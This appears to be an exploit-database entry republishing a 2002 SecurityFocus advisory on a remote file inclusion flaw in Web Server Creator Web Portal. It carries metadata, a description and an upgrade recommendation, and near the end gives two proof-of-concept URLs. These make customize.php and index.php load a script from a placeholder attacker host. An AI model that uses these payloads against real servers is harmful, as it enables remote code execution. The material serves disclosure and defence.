header-logo
Suggest Exploit
vendor:
Web Portal
by:
SecurityFocus
8.8
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Web Portal
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2002-1490
CPE: o:web_server_creator:web_portal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
2002

Web Server Creator Web Portal Remote File Inclusion Vulnerability

Web Server Creator Web Portal is vulnerable to a Remote File Inclusion vulnerability, which allows attackers to include arbitrary files from a remote server. This is possible due to the influence of the include path for the customize.php and index.php scripts. An attacker can cause an arbitrary PHP script to be included from an attacker-supplied source, which may result in execution of commands with the privileges of the webserver.

Mitigation:

Upgrade to the latest version of Web Server Creator Web Portal.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6251/info

The Web Server Creator Web Portal is prone to an issue which may allow attackers to include arbitrary files from a remote server.

It is possible for remote attackers to influence the include path for the customize.php and index.php scripts. As a result, an attacker may cause an arbitrary PHP script to be included from an attacker-supplied source, which may result in execution of commands with the privileges of the webserver.

http://[target]/news/include/customize.php?l=http://[attacker]/file.txt
http://[target]/index.php?pg=http://[attacker]/badfile

Navigation

Suggest Exploit

Services By CQR